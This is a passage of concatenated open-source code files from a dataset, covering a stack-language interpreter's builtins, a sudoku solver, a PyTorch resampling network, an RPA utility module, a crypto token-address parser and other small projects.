Returns a list with\n one list for each match; each list consists of the string matched\n by the regex followed by all of the regex's groups.\"\"\",\n stability=\"unstable\")\n # }}}\n # Stack functions {{{\n @put('Pop_stack', ';s',\n stability=\"beta\")\n def pop_stack(env: Environment) -> None:\n env.pop_until_stack_marker()\n @put('Reverse_stack', 'Down_stack', 'Ds',\n stability=\"beta\")\n def reverse_stack(env: Environment) -> None:\n env.push(*env.pop_until_stack_marker()[::-1])\n @put('Length_stack', 'Ls',\n stability=\"beta\")\n def length_stack(env: Environment) -> None:\n env.push(len(env.pop_until_stack_marker()))\n @put('Sum_stack', 'Šs',\n stability=\"beta\")\n def sum_stack(env: Environment) -> None:\n env.push(pd_deep_sum(env.pop_until_stack_marker()))\n @put('Product_stack', 'Þs',\n stability=\"beta\")\n def product_stack(env: Environment) -> None:\n # TODO: make this a deepmap or something?\n env.push(pd_deep_product(env.pop_until_stack_marker()))\n @put('Force_stack', 'Fs',\n stability=\"alpha\")\n def force_stack(env: Environment) -> None:\n env.maximize_length()\n @put('Output_stack', 'Os',\n stability=\"beta\")\n def output_stack(env: Environment) -> None:\n print(env.pd_str(env.pop_until_stack_marker()), end=\"\")\n @put('Print_stack', 'Ps',\n stability=\"beta\")\n def print_stack(env: Environment) -> None:\n env.print_output_record(env.pd_str(env.pop_until_stack_marker()))\n # }}}\n # Bullet assignment {{{\n @put('Assign_bullet', '·', docs=\"Assign to the variable •\",\n stability=\"alpha\")\n def assign_bullet(env: Environment) -> None:\n e = env.pop()\n env.push(e)\n env.put(BULLET, e)\n @put('Assign_bullet_destructive', '–', docs=\"Pop and assign to the variable •\",\n stability=\"alpha\")\n def assign_bullet_destructive(env: Environment) -> None:\n e = env.pop()\n env.put(BULLET, e)\n # @put('Append_to_bullet', '©', docs=\"Pop and append to the variable •\",\n # stability=\"alpha\")\n # def append_to_bullet(env: Environment) -> None:\n # assign.append_func(env, BULLET)\n # @put('Retrieve_bullet', '®',\n # docs=\"\"\"Push the current value of the variable •, then reset that\n # variable to 0.\"\"\",\n # stability=\"alpha\")\n # def retrieve_bullet(env: Environment) -> None:\n # assign.retrieve_func(env, BULLET)\n # }}}\n # unsafe metacomputing {{{\n @put('Sleep', 'Sl', docs=\"Sleep for some number of seconds.\",\n stability=\"alpha\")\n def sleep(env: Environment) -> None:\n e = env.pop()\n assert isinstance(e, (Char, int, float))\n time.sleep(num.realify(e))\n\n if sandboxed:\n @put('Python', 'Py',\n docs=\"\"\"Evaluate arbitrary Python code. Push the result if\n non-None.\n\n Disabled in sandbox mode.\"\"\",\n stability=\"alpha\")\n def python_eval_disabled(env: Environment) -> None:\n raise Exception('Python eval disabled in sandbox mode')\n\n @put('Shell', 'Sh',\n docs=\"\"\"Evaluate shell code. If given a string, executes it\n through the shell; if given a list, executes the first element\n as the executable with the following elements of the list as\n arguments. Pushes the stdout of the subprocess.\n\n Disabled in sandbox mode.\"\"\",\n stability=\"alpha\")\n def shell_eval_disabled(env: Environment) -> None:\n raise Exception('Shell eval disabled in sandbox mode')\n else:\n\n @put('Python', 'Py',\n docs=\"\"\"Evaluate arbitrary Python code. Push the result if\n non-None. 
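# Illustrative sketch (not part of the scraped file): the *_stack
# builtins above pop everything down to a sentinel marker and operate on
# the popped slice.
MARKER_DEMO = object()

def pop_until_marker_demo(stack):
    out = []
    while stack and stack[-1] is not MARKER_DEMO:
        out.append(stack.pop())
    if stack:
        stack.pop()  # discard the marker itself
    return out[::-1]

st = [MARKER_DEMO, 1, 2, 3]
assert pop_until_marker_demo(st) == [1, 2, 3] and st == []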
Unsafe!\"\"\",\n stability=\"alpha\")\n def python_eval(env: Environment) -> None:\n e = env.pop()\n res = eval(env.pd_str(e))\n if res is not None:\n env.push(res)\n\n @put('Shell', 'Sh',\n docs=\"\"\"Evaluate arbitrary shell code. Push the result if\n non-None. Unsafe!\"\"\",\n stability=\"alpha\")\n def shell_eval(env: Environment) -> None:\n import subprocess\n e = env.pop()\n if isinstance(e, list):\n proc = subprocess.Popen([env.pd_str(x) for x in e],\n stdout=subprocess.PIPE)\n elif isinstance(e, str):\n proc = subprocess.Popen(e, shell=True, stdout=subprocess.PIPE)\n else:\n raise Exception(\"Cannot evaluate non-list non-str as Shell\")\n env.push(proc.communicate()[0])\n\n # }}}\n env.lazy_var_triggers.append(arithmetic_literal_trigger)\n\n# vim:set tabstop=4 shiftwidth=4 expandtab fdm=marker:\n","repo_name":"betaveros/paradoc","sub_path":"paradoc/builtins/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":135760,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"40"} +{"seq_id":"6239498900","text":"#!/usr/bin/python\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport subprocess, time\n\nfrom six_mod.moves import xrange\n\nfor i in xrange(500):\n p = subprocess.Popen([\"python\", \"/home/pi/pi3d/demos/Minimal.py\"],\n stdin=subprocess.PIPE, stderr=subprocess.PIPE)\n time.sleep(7.0)\n stdoutdata, stderrdata = p.communicate(chr(27))\n with open(\"/home/pi/pi3d/experiments/minimal_count.txt\", \"w\") as myfile:\n myfile.write(str(i))\n\n\n","repo_name":"tipam/pi3d","sub_path":"experiments/RunMultipleMinimals.py","file_name":"RunMultipleMinimals.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":279,"dataset":"github-code","pt":"40"} +{"seq_id":"18415784047","text":"from board import *\n\n\ndef solve(board):\n \"\"\" Input: board- Board object\n\n A function using a recursive backtracking algorithm to solve a sudoku puzzle.\n Returns a boolean and prints the solved puzzle once it is found.\n \"\"\"\n position = board.getBlank() # get the next empty postion in the board\n\n # if there are no more empty positions, the puzzle has been solved; print the solution\n if position == None:\n print(\"Solution found:\")\n print()\n print(board)\n return True\n \n # loop through ints 1-9 and check if they are valid in the current empty position,\n # if yes place the value in the position and make a recursive call to fill the next\n # empty position\n for num in range(1, 10):\n if isValid(board, num, position[0], position[1]):\n board.placeValue(num, position[0], position[1])\n if solve(board) == True:\n return True\n board.removeValue(position[0], position[1])\n\n return False\n\n\ndef isValid(board, value, row, col):\n \"\"\" Inputs: board- Board object\n value- integer from 1-9 to be checked\n row- row index of the position to be checked\n col- column index of the position to be checked\n \n Outputs: a boolean indicating whether the given value can be placed in the \n specified position on the board based on whether the value is already in the \n position's row, column or inner box\n \"\"\"\n\n # check if the value is already in the row\n for c in range(len(board.cells[0])):\n if board.cells[row][c] == value:\n return False\n \n # check if the value is already in the column\n for r in range(len(board.cells)):\n if board.cells[r][col] == value:\n return False\n\n # check if the value is already in the inner 3x3 box the given 
position \n    # lies in (position (row, col) falls in the inner box in the range of \n    # rows from 3*(row // 3) to 3*(row // 3) + 3 - 1 and columns from 3*(col // 3) to \n    # 3*(col // 3) + 3 - 1)\n    for r in range(3*(row // 3) , 3*(row // 3) + 3):\n        for c in range(3*(col // 3), 3*(col // 3) + 3):\n            if board.cells[r][c] == value:\n                return False\n\n    # if the value is not in the row, column or inner box, the position is valid\n    return True\n\ndef main():\n    \"\"\" main program execution loop function \"\"\"\n    while True:\n        try: \n            rank = int(input(\"Enter a rank from 1-1000 (low end is easy, high end is hard): \"))\n        except ValueError:\n            print(\"Please enter an integer from 1-1000\")\n            continue\n        if rank < 1 or rank > 1000:\n            print(\"Please enter an integer from 1-1000\")\n            continue\n        else:\n            break\n    \n    board = Board(rank)\n    print(\"Initial Board:\")\n    print()\n    print(board)\n\n    while True:\n        try:\n            response = str(input(\"Find solution? (y/n): \"))\n        except ValueError:\n            print(\"Please respond with 'y' or 'n'\")\n            continue\n        if response == \"y\":\n            solve(board)\n            break\n        elif response == \"n\":\n            break\n        else:\n            print(\"Please respond with 'y' or 'n'\")\n            continue\n\nmain()","repo_name":"EMobilio/sudoku-solver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"73128643319","text":"import torch\nimport torch.nn as nn\nimport math\n\nLEAKY_FACTOR = 0.2\nRES_FACTOR = 1.0\ntorch.pi = torch.acos(torch.zeros(1)).item() * 2\n \nclass Downsampler(nn.Module):\n    def __init__(self, ksize, scale, batch):\n        super(Downsampler, self).__init__()\n        self.ksize = ksize\n        self.scale = scale\n        self.batch = batch\n    \n    def softround(self, x, alpha=1.0):\n        return x - alpha * (torch.sin( 2 * torch.pi * x ) / (2 * torch.pi))\n    \n    def batch_bli(self, im, x, y, channel_first=False, dtype=torch.FloatTensor, dtype_long=torch.LongTensor):\n        num_points = x.shape[1]\n        # Get four corner indices\n        x0 = torch.floor(x).type(dtype_long)\n        x1 = x0 + 1\n        y0 = torch.floor(y).type(dtype_long)\n        y1 = y0 + 1\n        # Clamp within h, w boundaries\n        x0 = torch.clamp(x0, 0, im.shape[2]-1)\n        x1 = torch.clamp(x1, 0, im.shape[2]-1)\n        y0 = torch.clamp(y0, 0, im.shape[1]-1)\n        y1 = torch.clamp(y1, 0, im.shape[1]-1)\n        # Get four corner pixel values\n        Ia = torch.cat([im[b, x, y, :] for b in range(self.batch) for x, y in zip(x0[b], y0[b])])\n        Ib = torch.cat([im[b, x, y, :] for b in range(self.batch) for x, y in zip(x0[b], y1[b])])\n        Ic = torch.cat([im[b, x, y, :] for b in range(self.batch) for x, y in zip(x1[b], y0[b])])\n        Id = torch.cat([im[b, x, y, :] for b in range(self.batch) for x, y in zip(x1[b], y1[b])])\n        # Define matrices\n        scale = (1 / ( (x1-x0) * (y1-y0) ) ).flatten()\n        m1 = torch.cat([ torch.sub(x1, x), torch.sub(x, x0)], dim=1).float()\n        m2 = torch.stack([Ib, Ia, Id, Ic], dim=1).reshape(self.batch*num_points,2,2,3).float()\n        m3 = torch.cat([ torch.sub(y1, y), torch.sub(y, y0) ], dim=1).float()\n        # Reshape for batch matmul\n        m1 = m1.reshape(self.batch*num_points,1,1,2).repeat(1,2,1,1)\n        m3 = m3.reshape(self.batch*num_points,1,2,1)\n        return scale[:,None] * torch.matmul( torch.matmul(m1, m2).permute(0,3,2,1), m3 ).flatten(start_dim=1)\n    \n    def forward(self, images, kernels, offsets_x, offsets_y, channel_first=False):\n        # ensure channel last\n        if channel_first:\n            images = images.permute(0,2,3,1)\n        self.batch = images.shape[0]\n        h, w = images.shape[2]//self.scale, images.shape[3]//self.scale\n        kernels = 
kernels.permute(0,2,3,1)\n        offsets_x = offsets_x.permute(0,2,3,1)\n        offsets_y = offsets_y.permute(0,2,3,1)\n        u, v = torch.arange(h)+0.5*self.scale-0.5, torch.arange(w)+0.5*self.scale-0.5\n        coords_x = torch.add(offsets_x, self.ksize/2)\n        coords_x = torch.add(coords_x, torch.arange(3).reshape(3,1).repeat(1,3).flatten())\n        coords_x = torch.add(coords_x, u.reshape(h,1).repeat(1,self.ksize**2))\n        coords_y = torch.add(offsets_y, self.ksize/2)\n        coords_y = torch.add(coords_y, torch.arange(3).repeat(3))\n        coords_y = torch.add(coords_y, v.reshape(w,1).repeat(1,self.ksize**2))  # v holds the width-axis sampling coordinates (u has length h)\n        pix_hr = self.batch_bli(images.permute(0,2,3,1), coords_x.flatten(start_dim=1), coords_y.flatten(start_dim=1), self.batch)\n        pix_hr = pix_hr.reshape(self.batch, h, w, self.ksize**2,3)\n        pix_lr = torch.mul(kernels.unsqueeze(-1).repeat(1,1,1,1,3), pix_hr)\n        out = torch.sum(pix_lr, axis=-2)\n        return self.softround(out*255.0)\n    \n\n\nclass MeanShift(nn.Conv2d):\n    def __init__(self, rgb_range, rgb_mean=(0.5, 0.5, 0.5), rgb_std=(1.0, 1.0, 1.0), sign=-1):\n        super(MeanShift, self).__init__(in_channels=3, out_channels=3, kernel_size=1)\n        std = torch.Tensor(rgb_std)\n        self.weight.data = torch.eye(3).view(3, 3, 1, 1) / std.view(3, 1, 1, 1)\n        self.bias.data = sign * rgb_range * torch.Tensor(rgb_mean) / std\n        for p in self.parameters():\n            p.requires_grad = False\n    \n    \nclass PixelUnshuffle(nn.Module):\n    def __init__(self, down_scale):\n        super(PixelUnshuffle, self).__init__()\n        if not isinstance(down_scale, int):\n            raise ValueError('Down scale factor must be an integer number')\n        self.down_scale = down_scale\n\n    def forward(self, input):\n        b, c, h, w = input.size()\n        assert h % self.down_scale == 0\n        assert w % self.down_scale == 0\n        oc = c * self.down_scale ** 2\n        oh = int(h / self.down_scale)\n        ow = int(w / self.down_scale)\n        output_reshaped = input.reshape(b, c, oh, self.down_scale, ow, self.down_scale)\n        output = output_reshaped.permute(0, 1, 3, 5, 2, 4).reshape(b, oc, oh, ow)\n        return output\n\n\nclass DownsampleBlock(nn.Module):\n    def __init__(self, scale, in_channels, out_channels):\n        super(DownsampleBlock, self).__init__()\n        self.unshuffle = PixelUnshuffle(scale)\n        self.conv = nn.Conv2d(in_channels*scale**2, out_channels, kernel_size=1, stride=1)\n    \n    def forward(self, x):\n        x = self.unshuffle(x)\n        x = self.conv(x)\n        return x\n    \n    \nclass UpsampleBlock(nn.Module):\n    def __init__(self, scale, in_channels, out_channels):\n        super(UpsampleBlock, self).__init__()\n        self.conv = nn.Conv2d(in_channels, out_channels*scale**2, kernel_size=1, stride=1)\n        self.shuffle = nn.PixelShuffle(scale)\n\n    def forward(self, x):\n        x = self.conv(x)\n        x = self.shuffle(x)\n        return x\n\n    \nclass ResidualBlock(nn.Module):\n    def __init__(self, in_channels, out_channels, kernel_size):\n        super(ResidualBlock, self).__init__()\n        self.transform = nn.Sequential(\n            nn.ReflectionPad2d(kernel_size//2),\n            nn.Conv2d(in_channels, out_channels, kernel_size),\n            nn.LeakyReLU(LEAKY_FACTOR),\n            nn.ReflectionPad2d(kernel_size//2),\n            nn.Conv2d(in_channels, out_channels, kernel_size)\n        )\n    \n    def forward(self, x):\n        return x + self.transform(x) * RES_FACTOR\n    \n\nclass TrunkBlock(nn.Module):\n    def __init__(self, upscale, in_channels, out_channels):\n        super(TrunkBlock, self).__init__()\n        self.transform = nn.Sequential(\n            nn.ReflectionPad2d(1),\n            nn.Conv2d(256, 256, kernel_size=3, stride=1),\n            nn.ReLU(),\n            nn.ReflectionPad2d(1),\n            nn.Conv2d(256, 256, kernel_size=3, stride=1),\n            nn.ReLU(),\n            nn.ReflectionPad2d(1),\n            nn.Conv2d(256, 256, kernel_size=3, stride=1),\n            nn.ReLU(),\n            
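# the ds_2/ds_4/ds_8 stages below downsample by 8 in total, so upsampling by\n            # 8//upscale leaves these maps at 1/upscale of the input resolution,\n            # i.e. one predicted kernel/offset per low-res output pixel\n            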
UpsampleBlock(scale=(8//upscale), in_channels=256, out_channels=256),\n            nn.ReflectionPad2d(1),\n            nn.Conv2d(256, 256, kernel_size=3, stride=1),\n            nn.ReLU()\n        )\n    \n    def forward(self, x):\n        x = self.transform(x)\n        return x\n\n\nclass ResamplerNet(nn.Module):\n    def __init__(self, rgb_range, res_blocks=5, kernel_size=(3,3)):\n        super(ResamplerNet, self).__init__()\n        \n        self.meanshift = MeanShift(rgb_range)\n        \n        self.ds_1 = nn.Sequential(\n            nn.ReflectionPad2d(2),\n            nn.Conv2d(3, 64, kernel_size=(5,5), stride=1),\n            nn.LeakyReLU(LEAKY_FACTOR)\n        )\n        \n        self.ds_2 = DownsampleBlock(2, 64, 128)\n        self.ds_4 = DownsampleBlock(2, 128, 128)\n        res_4 = list()\n        for idx in range(res_blocks):\n            res_4 += [ResidualBlock(128, 128, 3)]\n        self.res_4 = nn.Sequential(*res_4)\n        self.ds_8 = DownsampleBlock(2, 128, 256)\n        \n        self.kernel_trunk = TrunkBlock(2, 256, 256)\n        self.offset_trunk = TrunkBlock(2, 256, 256)\n        \n        self.kernel_prediction = nn.Sequential(\n            nn.ReflectionPad2d(1),\n            nn.Conv2d(256, 256, 3),\n            nn.ReLU(),\n            nn.ReflectionPad2d(1),\n            nn.Conv2d(256, math.prod(kernel_size), 3)\n        )\n        \n        self.offset_h_prediction = nn.Sequential(\n            nn.ReflectionPad2d(1),\n            nn.Conv2d(256, 256, 3),\n            nn.ReLU(),\n            nn.ReflectionPad2d(1),\n            nn.Conv2d(256, math.prod(kernel_size), 3),\n            nn.Tanh()\n        )\n        \n        self.offset_v_prediction = nn.Sequential(\n            nn.ReflectionPad2d(1),\n            nn.Conv2d(256, 256, 3),\n            nn.ReLU(),\n            nn.ReflectionPad2d(1),\n            nn.Conv2d(256, math.prod(kernel_size), 3),\n            nn.Tanh()\n        )\n        \n    def forward(self, x):\n        x = self.meanshift(x)\n        x = self.ds_1(x)\n        x = self.ds_2(x)\n        x = self.ds_4(x)\n        x = self.res_4(x)\n        x = self.ds_8(x)\n        \n        kernels = self.kernel_trunk(x)\n        kernels = torch.clamp(self.kernel_prediction(kernels), min=1e-6, max=1.0)\n        kernels = kernels / torch.sum(kernels, dim=1, keepdim=True).clamp(min=1e-6)\n        \n        offsets = self.offset_trunk(x)\n        offsets_h, offsets_v = self.offset_h_prediction(offsets), self.offset_v_prediction(offsets)\n        \n        return kernels, offsets_h, offsets_v\n    \n    ","repo_name":"garrett-partenza-us/openCAR","sub_path":"models/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":8916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"35367932712","text":"import datetime\n\nfrom graphql import graphql_enum\nfrom graphql import graphql_field\nfrom graphql import graphql_input_object\nfrom graphql import graphql_object\nfrom graphql import graphql_root_field\n\n\n@graphql_object('TestTimeSpan')\nclass TestTimeSpan(object):\n    \"\"\"Provides functionality pertaining to intervals of time.\"\"\"\n\n    @staticmethod\n    @graphql_root_field('testTimeSpan', 'TestTimeSpan!')\n    def instance():\n        \"\"\"Return an instance of TestTimeSpan.\"\"\"\n        return TestTimeSpan()\n\n    @staticmethod\n    @graphql_enum('TimeUnit')\n    def graphql_time_unit_enum():\n        \"\"\"GraphQL enumeration for units of time.\"\"\"\n        return {\n            'DAYS': 'days',\n            'SECONDS': 'seconds',\n            'WEEKS': 'weeks',\n        }\n\n    @staticmethod\n    @graphql_input_object('Interval')\n    def interval_input_type():\n        \"\"\"Describe the input object type for intervals of time.\n\n        return dict - A map from the names of\n        the input object fields to their type strings.\n        \"\"\"\n        return {\n            'number': 'Float!',\n            'unit': 'TimeUnit!',\n        }\n\n    @graphql_field(\n        'timeSum', 'TimeSpan!',\n        {'intervals': '[Interval!]', 'times': '[TimeSpan!]'})\n    def add_times(self, times=[], intervals=[]):\n        \"\"\"Return the sum of the specified intervals of time.\n\n        list times - The timedeltas to include in the sum.\n        list intervals - The 
intervals to include in the\n sum, formatted as suggested by the return value of\n interval_input_type().\n return timedelta - The sum.\n \"\"\"\n total = datetime.timedelta()\n for time in times:\n total += time\n for interval in intervals:\n if interval['unit'] == 'seconds':\n total += datetime.timedelta(seconds=interval['number'])\n elif interval['unit'] == 'days':\n total += datetime.timedelta(days=interval['number'])\n elif interval['unit'] == 'weeks':\n total += datetime.timedelta(weeks=interval['number'])\n return total\n","repo_name":"btrekkie/graphql","sub_path":"src/graphql/executor/test/scalar_descriptors/time_span.py","file_name":"time_span.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33694550957","text":"from Math import *\r\nfrom Physics import *\r\nfrom Others import *\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ndef MatchImageTemplateInOpencv2 (\r\n HayStackImg = '',\r\n NeddleImg = '', \r\n ImgReadMethod = cv2.IMREAD_UNCHANGED,\r\n MatchTemplateMethod = cv2.TM_CCOEFF_NORMED,\r\n ConfidenceThreshold = 0.7,\r\n RectangleColour = (0, 255, 0),\r\n RectanlgeLineType = cv2.LINE_4,\r\n RectangleThickness = 2,\r\n\r\n FrameName = 'frame',\r\n\r\n FoundMsg = None,\r\n NotFoundMsg = None\r\n) :\r\n \r\n haystack_img = cv2.imread(HayStackImg, ImgReadMethod)\r\n needle_img = cv2.imread(NeddleImg, ImgReadMethod)\r\n\r\n result = cv2.matchTemplate(haystack_img, needle_img, MatchTemplateMethod)\r\n\r\n threshold = ConfidenceThreshold\r\n\r\n locations = np.where(result >= threshold)\r\n\r\n locations = list(zip(*locations[::-1]))\r\n\r\n if locations :\r\n print(FoundMsg)\r\n\r\n needle_w = needle_img.shape[1]\r\n needle_h = needle_img.shape[0]\r\n\r\n line_colour = RectangleColour\r\n line_type = RectanlgeLineType\r\n\r\n for loc in locations :\r\n top_left = loc\r\n bottom_right = (top_left[0] + needle_w, top_left[1] + needle_h)\r\n\r\n cv2.rectangle(haystack_img, top_left, bottom_right, line_colour, thickness = RectangleThickness)\r\n\r\n cv2.imshow(FrameName, haystack_img)\r\n\r\n cv2.waitKey()\r\n\r\n else :\r\n print(NotFoundMsg)","repo_name":"HARSH-PYTHON-X/ComputerOPM","sub_path":"ComputerVision.py","file_name":"ComputerVision.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10509309150","text":"N, M = map(int, input().split())\nice_graph = [list(map(int, input())) for _ in range(N)]\nresult = 0\n\n\"\"\"\n연결된 0이 총 몇 개인지를 찾아야됨 \n들어가면서 체크해야할 것 \n1.방문했는가 \n2.0인지 1인지 \n3.0이면 탐색을 쭉 해서 0 탐색이 끝날 때까지 탐색 계속하고 결과값 하나 올리기\n4. 
1일땐 딱히 할 거 없으므로 1 자체를 방문O로 사용 \n\"\"\"\n\n\ndef dfs(graph, x, y):\n    if x < 0 or x > N-1 or y < 0 or y > M-1:\n        return False\n    # 만약 0이면 주변에 0이 없을 때까지 계속 0을 탐색 해야함\n    # 방문한 0은 1로 변환시키기\n    if graph[x][y] == 0:\n        graph[x][y] = 1\n        # 상하좌우 네 방향 탐색\n        dfs(graph, x-1, y)\n        dfs(graph, x+1, y)\n        dfs(graph, x, y-1)\n        dfs(graph, x, y+1)\n        return True\n    return False\n\n\nfor i in range(N):\n    for j in range(M):\n        if dfs(ice_graph, i, j):\n            result += 1\n\nprint(result)\n","repo_name":"yunyezl/algoitzman","sub_path":"nahee/DFS&BFS/실전3_음료수 얼려 먹기.py","file_name":"실전3_음료수 얼려 먹기.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"}
{"seq_id":"7314611261","text":"import time\nimport os\nimport tkinter\nimport tempfile\nimport uuid\nimport pyperclip\nfrom rpa.日志模块.log import output_log\n\n\ndef pop_up_prompt_box(msg, times):\n    \"\"\"\n    弹出提示框\n    :param msg: 弹出的信息\n    :param times: 弹出的时间ms\n    :return:\n    \"\"\"\n    logger = output_log()\n    if not isinstance(times, int):\n        logger.error('错误信息:时间类型错误')\n        raise Exception('时间类型错误')\n    msg_type = type(msg)\n    try:\n        root = tkinter.Tk()\n        root.title('弹出提示框')\n        root['width'] = 400\n        root['height'] = 300\n        root.resizable(False, False)\n        rich_text = tkinter.Text(root, width=380)\n        rich_text.place(x=10, y=10, width=380, height=380)\n        rich_text.insert('0.9', f\"{msg}\")\n        rich_text.insert('0.9', msg_type)\n        root.after(times, root.destroy)\n        root.mainloop()\n        logger.info(f'弹出内容:{msg_type},{msg}')\n    except Exception as e:\n        logger.error(f'错误信息:{e}')\n        raise e\n\n\ndef cmd_command(command):\n    \"\"\"\n    cmd命令行\n    :param command: 命令\n    :return: 结果\n    \"\"\"\n    logger = output_log()\n    if not isinstance(command, str):\n        logger.error('错误信息:输出参数类型错误')\n        raise Exception('输入参数类型错误')\n    try:\n        re = os.popen(command)\n        result = re.read()\n        logger.info(f'输出为:{result}')\n        return result\n    except Exception as e:\n        logger.error(f\"错误信息:{e}\")\n        raise e\n\n\ndef print_log(msg, log_level):\n    \"\"\"\n    打印日志\n    :param msg: 输出信息\n    :param log_level: 日志等级\n    :return:\n    \"\"\"\n    logger = output_log()\n    if log_level not in [\"debug\", \"info\", \"error\"]:\n        logger.error('错误信息:日志类型错误')\n        raise Exception('日志类型错误')\n    try:\n        if log_level == 'debug':\n            logger.debug(msg)\n            return\n        elif log_level == 'info':\n            logger.info(msg)\n            return\n        elif log_level == 'error':\n            logger.error(msg)\n            return\n\n    except Exception as e:\n        logger.error(f'错误信息:{e}')\n        raise e\n\n\ndef wait_time(times):\n    \"\"\"\n    等待时间\n    :param times: 等待时间 s\n    :return:\n    \"\"\"\n    logger = output_log()\n    if not isinstance(times, int):\n        logger.error(f'错误信息:输入类型错误')\n        raise Exception('输入类型错误')\n    logger.info(f\"process wait_time:等待时间为:{times}s\")\n    time.sleep(times)\n    return\n\n\ndef get_uuid():\n    \"\"\"\n    获取uuid\n    :return: 输出UUID\n    \"\"\"\n    logger = output_log()\n    try:\n        out_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, 'rpa')\n        logger.info(f\"process get_uuid:{out_uuid}\")\n        return out_uuid\n    except Exception as e:\n        logger.error(f'process get_uuid:错误信息为:{e}')\n        raise e\n\n\ndef get_username():\n    \"\"\"\n    获取用户名\n    :return: 用户名\n    \"\"\"\n    logger = output_log()\n    user_name = os.getlogin()\n    logger.info(f\"process get_username:{user_name}\")\n    return user_name\n\n\ndef temporary_file_directory():\n    \"\"\"\n    获取临时文件夹目录\n    :return: 输出临时文件夹目录\n    \"\"\"\n    logger = output_log()\n    temp_directory = tempfile.gettempdir()\n    logger.info(f'process temporary_file_directory:{temp_directory}')\n    return temp_directory\n\n\nif __name__ == '__main__':\n    # pop_up_prompt_box({\"ssf\":13}, 1230)\n    # cmd_command('dir')\n    # print_log('lkjhdasf', 
log_level='info')\n    # wait_time(3)\n    # get_uuid()\n    # get_username()\n    temporary_file_directory()\n","repo_name":"zhangxin-nb/practice","sub_path":"rpa/系统功能/常用系统功能.py","file_name":"常用系统功能.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"16586914919","text":"import os\nfrom peewee import *\nfrom playhouse.db_url import connect\n\n\nclass Database:\n\n    def __init__(self, db_tables):\n        self.DEBUG = True\n        self.DATABASE = self.set_database()\n        self.db_tables = db_tables\n\n\n    def set_database(self):\n        if self.DEBUG:\n            print('Using SQLite DB')\n            return SqliteDatabase('find-covid.sqlite')\n        else:\n            print('Using Production DB')\n            return connect(os.environ['DB_URL'])\n    \n\n\n    def initialize_tables(self):\n        self.DATABASE.connect()\n        self.DATABASE.create_tables(self.db_tables)\n        self.DATABASE.close()\n","repo_name":"mitchellpottratz/find-covid","sub_path":"backend/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"19260223471","text":"import re\nfrom telethon.tl import types\nfrom typing import List\n\ncompiled_re = re.compile('0x[a-fA-F0-9]{40}')\n\nCHAIN_SEARCH_TERMS = {\n    'eth': ['dexscreener.com/ethereum', 'dextools.io/app/ether/'],\n    'bsc': ['poocoin.app/tokens/', 'dexscreener.com/bsc', 'dextools.io/app/bsc'],\n    'avax': ['dexscreener.com/avalanche', 'dextools.io/app/avalanche'],\n    'ftm': ['dexscreener.com/fantom', 'dextools.io/app/fantom'],\n    'poly': ['dexscreener.com/polygon', 'dextools.io/app/polygon']\n}\n\n#later: 'cronos': dexscreener.com/cronos/\n\nclass ParseResult:\n    def __init__(self, addresses: List[str], chains: List[str]):\n        self.addresses = addresses\n        self.chains = chains\n\n\ndef parse_message(message_text) -> ParseResult:\n    \"\"\"\n    :param message_text:\n    :return: ParseResult -> address of a token or Uniswap-like pair and the chain that it's on. 
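For example, a message containing a\n    dextools.io/app/ether/ link maps to chain 'eth' (see CHAIN_SEARCH_TERMS\n    above). 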
None if no\n address contained in message\n \"\"\"\n\n if message_text is None:\n return ParseResult([], [])\n\n found_addresses = compiled_re.findall(message_text)\n found_chains = []\n\n for chain_name, search_terms in CHAIN_SEARCH_TERMS.items():\n message_contains_any_searchterm = any(map(lambda x: x in message_text, search_terms))\n if message_contains_any_searchterm:\n found_chains.append(chain_name)\n\n return ParseResult(found_addresses, found_chains)\n","repo_name":"Minh-Trng/telegram-token-sniper","sub_path":"telegramtokensniper/parsing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"23520239193","text":"import datetime\nimport logging\nimport re\nfrom typing import Any, List, Optional\n\nfrom coretypes import FrameType\nfrom omicron.extensions.decimals import math_round\nfrom omicron.models.board import Board\nfrom omicron.models.timeframe import TimeFrame\n\nfrom omega.boards.board import ConceptBoard, IndustryBoard\nfrom omega.boards.storage import calculate_ma_list, calculate_rsi_list\nfrom omega.webservice.stockinfo import GlobalStockInfo\n\nlogger = logging.getLogger(__name__)\n\n\ndef new_boards(days: int = 10):\n cb = ConceptBoard()\n cb.init()\n result = cb.find_new_concept_boards(days)\n if result is None or len(result) == 0:\n print(f\"近{days}天内没有新的概念板块\")\n else:\n print(result)\n\n\ndef latest_boards(n: int = 3):\n cb = ConceptBoard()\n cb.init()\n df = cb.find_latest_n_concept_boards(n)\n print(df)\n\n\ndef new_members(days: int = 10, prot: int = None):\n cb = ConceptBoard()\n cb.init()\n try:\n results = cb.new_members_in_board(days)\n if len(results) == 0:\n print(f\"近{days}天内没有板块有新增成员\")\n else:\n for board, stocks in results.items():\n print(cb.get_name(board) + \":\")\n aliases = [cb.get_stock_alias(stock) for stock in stocks]\n print(\" \".join(aliases))\n except Exception as e:\n print(e)\n\n\ndef combined_filter(\n industry: str = None, with_concepts: Optional[List[str]] = None, without=[]\n) -> List[str]:\n 